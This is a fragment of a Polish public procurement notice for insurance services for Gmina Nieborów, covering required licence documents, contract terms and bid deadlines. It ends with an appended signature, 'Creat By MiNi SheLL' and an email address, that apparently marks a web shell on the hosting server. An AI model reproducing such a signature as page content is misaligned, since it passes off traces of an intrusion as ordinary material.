miejsce<br/>zamieszkania, zgodnie z warunkiem określonym w Rozdziale IX, ust. 1 pkt 3 SWZ, tj.<br/>a) złożenia zezwolenia właściwego organu na prowadzenie działalności ubezpieczeniowej w myśl ustawy z dnia 11 września 2015<br/>roku o działalności ubezpieczeniowej i reasekuracyjnej co najmniej w zakresie tożsamym z przedmiotem niniejszego zamówienia<br/>b) jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, zamiast dokumentów, o<br/>których mowa w lit. a) powyżej – Wykonawca składa dokument lub dokumenty wystawione w kraju, w którym ma miejsce<br/>zamieszkania lub siedzibę, potwierdzające, że może wykonywać działalność ubezpieczeniową i posiada uprawnienia do<br/>wykonywania działalności ubezpieczeniowej związanej z przedmiotem zamówienia (co najmniej w zakresie tożsamym z<br/>przedmiotem niniejszego zamówienia),<br/>c) gdy zezwolenie właściwego organu nadzoru nie jest wymagane na podstawie odrębnych przepisów, Wykonawca składa:<br/>i. zaświadczenie właściwego organu nadzoru, że Wykonawca prowadzi działalność ubezpieczeniową w wymaganym zakresie (tj. co<br/>najmniej w zakresie tożsamym z przedmiotem niniejszego zamówienia),<br/>ii. a jeżeli organ nadzoru nie wydaje zaświadczeń, o których mowa w lit. i powyżej – Wykonawca składa oświadczenie organu<br/>uprawnionego do reprezentowania Wykonawcy, że prowadzi on działalność ubezpieczeniową w wymaganym zakresie i nie jest<br/>konieczne posiadanie przez niego zezwolenia wraz z przytoczeniem podstawy prawnej.<br/>d) W przypadku, gdy Wykonawca ma siedzibę poza terytorium Rzeczpospolitej Polskiej w innym państwie członkowskim Unii<br/>Europejskiej – Wykonawca składa dodatkowo potwierdzenie faktu notyfikacji otrzymane od organu nadzoru, a jeżeli organ nadzoru w<br/>kraju siedziby Wykonawcy takiego potwierdzenia nie dostarcza, Wykonawca składa oświadczenie, że notyfikacja została dokonana i<br/>przyjęta przez polski organ nadzoru.<br/>3) oświadczenia Wykonawcy o aktualności informacji zawartych w oświadczeniu, o którym mowa w ust. 1 powyżej, w zakresie<br/>podstaw wykluczenia z Postępowania (wzór oświadczenia stanowi Załącznik nr 8 do SWZ).<br/>4. Jeżeli jest to niezbędne do zapewnienia odpowiedniego przebiegu Postępowania, Zamawiający może na każdym etapie<br/>Postępowania, wezwać Wykonawców do złożenia wszystkich lub niektórych podmiotowych środków dowodowych, jeżeli wymagał<br/>ich złożenia w ogłoszeniu o zamówieniu lub dokumentach zamówienia, aktualnych na dzień ich złożenia.</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> zgodnie z swz <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 2. Przewiduje się możliwość zmiany postanowień umowy w przypadkach określonych w PZP, a także możliwość zmian,<br/>których zakres, charakter i warunki wprowadzenia zostały określone w projekcie umowy. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2023-11-30 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://gmina-nieborow.ezamawiajacy.pl</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2023-11-30 10:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2023-12-20</span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com